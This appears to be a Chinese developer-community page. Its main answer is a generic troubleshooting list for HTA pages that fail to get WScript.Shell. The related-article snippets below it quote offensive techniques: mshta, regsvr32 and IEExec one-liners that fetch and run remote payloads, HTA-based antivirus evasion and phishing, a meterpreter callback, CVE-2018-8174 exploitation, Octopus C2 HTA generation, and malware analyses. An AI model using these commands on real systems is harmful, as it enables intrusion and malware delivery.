开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

从HTA页面获取WScript.Shell时出现问题

可能是由于以下原因之一：

HTA页面的安全性限制：HTA（HTML应用程序）是一种允许在本地计算机上运行的HTML文件，但由于安全性考虑，HTA页面的脚本执行权限受到限制。在某些情况下，获取WScript.Shell对象可能被禁止。

解决方法：可以尝试修改HTA页面的安全设置，允许执行脚本或者提升页面的权限。具体操作可以参考相关的HTA页面开发文档或者浏览器的安全设置。

WScript.Shell对象未注册或不可用：WScript.Shell是Windows Script Host（WSH）提供的一个对象，用于执行操作系统的命令和脚本。如果该对象未注册或不可用，就无法在HTA页面中获取。

解决方法：确保目标计算机上已经安装了Windows Script Host，并且WScript.Shell对象已经注册。如果未注册，可以尝试重新安装或修复Windows Script Host。

HTA页面中的脚本错误：在获取WScript.Shell对象的过程中，可能存在HTA页面中的脚本错误，导致获取失败。

解决方法：检查HTA页面中的脚本代码，确保语法正确、逻辑清晰。可以使用调试工具或者日志输出来定位问题所在，并进行修复。

总结：

从HTA页面获取WScript.Shell时出现问题可能是由于HTA页面的安全性限制、WScript.Shell对象未注册或不可用、HTA页面中的脚本错误等原因。解决方法包括修改HTA页面的安全设置、确保WScript.Shell对象已注册、修复HTA页面中的脚本错误等。具体解决方法需要根据具体情况进行调试和修复。

相关搜索:Firebase:从嵌套onSnapshot获取数据时出现问题从api调用获取Json数据时出现问题从httpClient获取HttpErrorResponse时出现问题从ImportXML获取日期时出现问题。需要选项从jar获取退出代码时出现问题从Json响应中获取值时出现问题从json获取text[]时出现问题从JS获取到Django视图时出现问题从mongoose获取架构实例时出现问题从powershell获取输出时出现问题

相关搜索:

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

从DY用户页面获取作品列表

本文内容是其中一种方案，从用户主页的HTML响应内容中抽取user信息和作品列表数据。...接下来就是如何获取用户主页HTML文本。...__ac_nonce和ttwid是服务端返回的，但是如果直接从用户主页去获取ttwid，则需要有 s_v_web_id作为注册前提，所以可以从index页面去注册ttwid。

1.6K2 0

使用hta操作nginx停止、重启

最初只是说把当时切割好的静态页面给他们，后来觉得不是很好的一种方案，希望一些不会变的页面，如：游戏的攻略、玩家、常用活动、排行、热门道具等，将这些页面也弄成一个静态的，这样联合运营商就不再需要进行编辑。...这样只能绕开请求静态页，让爬虫抓取动态页面(需要修改nginx的nginx.conf配置，在请求后台接口时关闭ssi---ssi off;)，在模板中使用ssi include语法嵌入共用页。...前面使用ssi include共用页，例如nav.html，这个页面可能有引用一些css、js，它的链接地址写的也是相对的，这样会导致请求这些文件时路径不对，出现404，而这个还不是重点，最要命的是nginx...文件时需要允许它运行，不然没得完了。...总结一下，用到的技术：php、javascript、css、hta、batch(批处理)、nginx的配置、SSI，上面记录下的是在实现那个想法时遇到的一些问题，以及如何定位问题然后解决它的。

1.8K1 0

我有两把枪：Powershell + HTA

HTA是HTML-Application的缩写，是软件开发的新概念，直接将某个html页面保存成hta的格式，就是一个独立的应用软件，点开与网页内容并无区别，界面与VB、C++等程序语言所设计的软件界面没什么差别... Set Hello = CreateObject("Wscript.Shell") Hello.Run..."calc.exe" 虽然说也是静态页面，但hta脚本可以直接使用vbs并调用Wscript.Shell，毕竟人家是html家里的大哥大，偏应用型的脚本类型...发给朋友试试，（各种杀毒，安全狗，老大哥型测试环境）直接弹回了一个meterpreter_shell，从点击到回弹间隔了5到6秒，估计因为调用powershell和base64处理时间（第二次貌似点开就快了些...>|||||||||||||]35% Set Hackdo = CreateObject("Wscript.Shell

1.9K8 0

页面打开时div从右侧进入原

function addclass(){ document.querySelector("div").classList.add("in") } 页面未加载时...，用transform:translateX(100%);把div定位到右边隐藏，当页面加载的时候，增加in class, .in{transform:translateX(0)}，translateX...从100% 到 0转变，增加过度时间0.8s完成，transition:all 0.8s; (adsbygoogle = window.adsbygoogle || []).push({});

1.1K2 0

jscript调用bat注意事项

之前打包时都手工操作，复制与加密这二步分别写了几个工具（lua加密与图片资源加密是分开的），后来感觉bat操作路径特别麻烦，所以我改用了hta写了一个界面，让使用者可以输入版本号，控制台上显示程序运行状态...如果某个文件类型已正确注册到某个程序中，则对该类型的文件调用 Run 方法时将执行该程序。...%n进行获取。只是如果传入的参数是路径，必须是“\”而不能为“/”，否则某些应用程序在读取路径时会找不到路径，导致程序执行失败。...通过WScript.Shell对象获取应用程序的执行目录，例如现在想获得WinRAR的应用程序目录： rarPath = wsh.RegRead("HKEY_CLASSES_ROOT\\WinRAR\\...压缩后删除文件 m 设置压缩级别(0-存储...3-默认...5-最大) -x 排除指定的文件 x@ 排除指定列表文件中的文件 n 仅包含指定的文件 n@ 从标准输入设备读取文件名到包括

9213 0

利用HTA文件绕过杀软及邮件钓⻥

HTML TEST // 开启⼀个计算器 CreateObject("WScript.Shell...双击时，会弹出hta⽂件的框，有时候为了避免弹出这个框，可以在hta⽂件中添加样式： <HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR...readme2.txt.lnk 时正常打开readme.txt 使⽤mshta readme2.txt.lnk时，执⾏我们的脚本和帮助⽂件进⾏拼接上述的两种⽅式，都需要⼿⼯输⼊mshta命令来进⾏...使⽤HTML Help Workshop 编译⽣成 chm⽂件利⽤代码就时 hello.htm的第10⾏， ,cmd,/c mshta %CD%\hello.chm 和hta⽂件进⾏绑定 copy.../b hello.chm+test.hta hello.chm 这样就实现了⽤户在点击时，在不影响原有程序的基础上执⾏我们的hta脚本。

1.8K1 0

用不同姿势复现 CVE-2018-8174 漏洞

用户在浏览网页或打开 Office 文档时都可能中招，最终被黑客植入后门木马完全控制电脑。...实验二：利用 mshta 从远程服务器下载文件并执行。...POC 附件：https://pan.baidu.com/s/14vP4CMdjEKkRdHBb7vLSHg 密码：ci8h 1.构造 hta 文件，通过 ActiveXObject 调用 WScript.shell...实验三：利用 NC 监听获取 msf session....到这里已经成功获取到 shell。实验中遇到的坑： 1、NC 测试成功，尝试 msf handler 监听，出现错误。 ? 获取到会话，直接 died 了。

2.2K0 0

Windows文件下载执行的15种姿势

当我们通过Web渗透获取了一个Shell，而且目标主机是Windows，我们该怎么去下载后门文件到目标主机上执行呢？一般来说，实现Windows文件下载执行的方式不外乎以下几种方式。...文件，而hta是HTML Applocation 的缩写，也就是HTML应用程序。...而hta中也支持VBS。所以我们可以利用hta来下载文件。...mshta http://192.168.28.128/run.hta run.hta内容如下： <meta http-equiv="Content-Type" content="text...[CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </scriptlet

3.4K1 1

USB钓鱼几种方式总结。

AutoOpen2 AutoOpen Set objFSO = CreateObject( "Scripting.FileSystemObject" ) Set WshShell = CreateObject("WScript.Shell...macro_pack生成lnk，这里U盘的盘符为”F:”,运行一下命令生成lnk： macro_pack.exe -G G:\confidential.jpg.lnk * 当提示输入”Shortcut_Target”时输入我们需要打开...运行的命令： %windir%\system32\cmd.exe /c start "" "mshta" "%CD%\wuyifan.jpg.lnk" * 当提示输入”Shortcut_Icon”时输入...wuyifan.jpg.lnk，会触发payload，加载DLL并隐藏到%TEMP%\Document1.asd中，加载payload的方式为： CreateObject("WScript.Shell"...或者Sysinternals procexp运行，并且lnk文件被真实的图片替换，实例中USB文件运行的命令容易被杀软识别出来方式二：针对”README.txt”文件当目标打开README.txt时，

1.3K1 0

通过命令下载执行恶意代码的几种姿势

一、Linux 远程恶意代码执行 01、curl 以用curl的方式执行http页面上的shell脚本，无需download，在本地机器上直接执行。...http://192.168.28.128/imag/evil.txt delete 04、rundll32 使用rundll32.exe，可以通过mshtml.dll执行JavaScript ，依赖于WScript.shell...regsvr32.exe /u /n /s /i:http://192.168.28.131:8888/file.sct scrobj.dll 06、wmic 执行WMIC以下命令从远程服务器下载并运行恶意...Windows\Microsoft.NET\Framework64\v2.0.50727>IEExec.exe http://192.168.28.131/evil.exe 09、mshta mshta用于执行.hta...文件 mshta http://192.168.28.128/run.hta 10、msxsl msxsl.exe是微软用于命令行下处理XSL的一个程序 msxsl http://192.168.28.128

2.1K2 0

Quantum 构建工具使用新的 TTP 投递 Agent Tesla

【HTA 主要函数】解密出来的 PowerShell 脚本如下所示：【解密 PowerShell 代码】解密完成后，恶意函数就会通过 CreateObject() 创建一个 Wscript.Shell...【PowerShell 代码执行】解密的代码以隐藏窗口的形式执行，解密后会获取另一个 PowerShell 代码。...UAC 通过操作文件属性隐藏 Agent Tesla Agent Tesla 被硬编码命名为 MuUQDuaFNoGmHQE.exe，并且被最终执行：【解密 PowerShell 代码】解密可获取...通过将整数转换为字符然后替换空格并进一步利用 MSHTA 从远程 URL 执行 HTA 文件，如下所示。...() 执行代码】下载落地后，使用 Start-Process() 从 AppData 路径执行 Agent Tesla。

1.5K2 0

CVE-2018-8174 “双杀”0day漏洞复现

用户在浏览网页或打开Office文档时都可能中招，最终被黑客植入后门木马完全控制电脑。 POC验证未打补丁系统，IE浏览器打开此地址会弹出计算器。阅读原文下载POC。 ?...local/目录中的 msf.rtf 文件到目标主机上使用word文档打开或者IE浏览器打开 http://192.168.0.116:8080 即可获得会话自定义下载者复现利用 mshta 从远程服务器下载文件执行...1.构造HTA文件，当访问hta文件就会触发powershell下载文件至临时目录执行准备你的xx.exe文件上传至站点目录，假如得到地址 http://xxx.com/xxx.exe ?...HTA代码： a=new ActiveXObject("WScript.Shell"); a.run('%SystemRoot%/system32/WindowsPowerShell/...='mshta http://xxx.lr3800.com/8174.hta' -f js_le exitfunc=thread -a x86 ?

1.4K0 0

CVE 2017-0199漏洞利用的新姿势

近日从客户处捕获一枚邮件附件中的可疑word样本，以下是扫描结果，检测率貌似不高。手动分析吧。...文件md5：0b16b255918264667a9f03e0b9f45167 1.攻击流程的第一步打开该word样本没有给任何提示该就直接联网获取文件： windbg挂着找了半天，一直没发现这个链接动作是怎么触发的...url解出来后是https://klotshop.tech/images/maps/nin.hta，一个hta文件，由于0199漏洞的存在，该hta文件会被直接执行。...3.恶意攻击流程的第三步： nin.hta文件内容如下：解密后如下： Dim adIM bSET a = CreateObject("WScript.Shell")...Windows\\system32\\cmd.exe\"\"/c\"", 0 SET a = nOtHINgself.CloSE 4.攻击流程的第四步：第三步中的hta

1.2K5 0

django之从html页面表单获取输入的数据实例

本文主要讲解如何获取用户在html页面中输入的信息。 1.首先写一个自定义的html网页 login.html <!...placeholder="your password" <br <input type="submit" value="提交" <br </form 重启服务，再次输入用户名密码就可以得到在页面输入的信息了...以上这篇django之从html页面表单获取输入的数据实例就是小编分享给大家的全部内容了，希望能给大家一个参考。

6.2K1 0

渗透技巧——从github下载文件的多种方法

渗透技巧——从github下载文件的多种方法 0x00 前言 ---- 本文源于一个有趣的问题：已知exe文件：https://github.com/3gstudent/test/raw/master...原理： regsve32->JScript->powershell->download&exec JScript调用powershell实现下载执行的代码为： new ActiveXObject("WScript.Shell...也可使用如下思路实现(代码略)： regsve32->JScript->powershell->download&exec 6、msiexec 该方法我之前的两篇文章《渗透测试中的msiexec》《渗透技巧——从Admin...脚本时，类似于浏览器，会根据链接返回头进行对应的解析操作，所以这里只有当返回头为html时才会运行否则会被当普通文本进行解析对于github的代码，返回的格式为text/plain 如果使用如下命令执行...但是我们可以换一个思路：将hta文件传到github的博客下面，就能够被解析成html，实现代码执行将hta文件上传至github博客下面，地址为https://3gstudent.github.io

3.6K2 0

常见的windows下无文件落地攻击手法

2）基于机器学习（ML）的反恶意软件方法，在应对无文件攻击时，面临着与传统AV相同的挑战。ML动态分析未知文件，并将其区分为好的或坏的。...大多数的Windows操作系统都支持Hta文件执行，利用Mshta.exe解析.hta文件执行，这里的.hta文件可以是本地的也可以是可访问的远程主机上的。...在cobalt strike中利用; 1.生成一个远端HTA恶意脚本 ? 设置好监听器 ? 部署好远端HTA木马 ? ?...我们从微软文档中重点看一些对渗透/红队行动中帮助较大的一些东西 -dump 转储配置信息或文件。...我们在把我们要传输的脚本放在cobalt strike中（实战的时建议payload和回连c2分离）。 ?

5.1K2 0

关于从相册中获取图片，图片展示时被旋转了

调用Android系统相册功能后，三星手机照片被旋转了90度。经资料查询，这是由于三星手机拍照的图片旋转角度是90度，而其它手机是0度。这样思路就出来了：先...

1.4K2 0

分析一个用于传播Hancitor恶意软件的Word文档（第一部分）

kfs() kfs()看上去像是垃圾代码，因为它的作用只是简单地将页面向下移动14，向右移动24，使用backspace一次，然后复制一些东西，而这并不会造成太大的影响。 ?...sdfsdf() sdfsdf()似乎负责提取恶意代码，因为在与文档中的.pif图标交互时，它会在%TEMP%文件夹中创建一个快捷方式文件，即使你没有单击启用宏。在关闭文档时，快捷方式文件会消失。...从名称上看，它们像是由恶意软件下载的恶意文件，以防止出现几个Hancitor实例同时运行的情况。...如果bdagent.exe正在运行，恶意宏则将创建%TEMP%\1.hta并将句柄存储在#1中。当你看到Print＃1时，宏实际上正在将字符串写入1.hta，而不是将其显示出来。...最后，使用一个 WScript.Shell对象将1.hta移动到％TEMP％文件夹并以静默方式执行，然后宏退出。 ?

1.4K2 1

命令控制之Octopus

powershell代理，其主要目的是要在任何红队行动之前使用，而不是开始与您的整个作战武库和基础设施接触，您可以在开始实际的红队行动之前先使用Octopus攻击目标并收集信息 Octopus在与C2通信时被设计为隐秘且隐蔽的...生成不同类型的有效载荷支持Powershell 2.0或更高版本的所有Windows版本在不触摸powershell.exe进程的情况下运行Octopus Windows可执行代理创建自定义配置文件从端点自动收集信息...同时，您还需要安装mono，以确保可以编译C＃源代码而不会出现问题： apt install mono-devel 之后启用即可：工具使用 Octopus的使用非常简单，你只需要启动一个侦听器并根据该侦听器的信息生成代理即可...ESA信息，ESA模块代表“端点态势感知”，它可以帮助攻击者获取有关端点和基础架构的一些额外信息，例如： OS的构建是什么？...，只需执行“ download file_path”即可下载文件 HTA oneliner 要为listener1生成HTA oneliner，operation1我们可以使用以下命令： generate_hta

5022 0

【工具使用】强大的红队武器Octopus“吊打”杀软

Octopus旨在与C2进行通信时隐秘而隐秘，因为它在Powershell代理和C2服务器之间的加密通道默认使用AES-256。...install -r requirements.txt -i https://mirrors.aliyun.com/pypi/simple/ 系统上还需要安装mono，以确保可以编译C＃源代码而不会出现问题...listen_http listen_http BindIP BindPort hostname interval URL listener_name 监听器ip 监听器端口主机名间隔时间页面...由于使用了@ahmedkhlief，他可以重用APT34威胁组中的代码，该威胁组从C2下载HTA文件内容并使用mshta.exe受信任的Windows二进制文件运行，以获取最终的Powershell代理已执行...您可以使用以下命令“ generate_hta”生成HTA： generate_hta test 具体怎么操作使用就看各位大佬自行发挥。

1.3K2 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭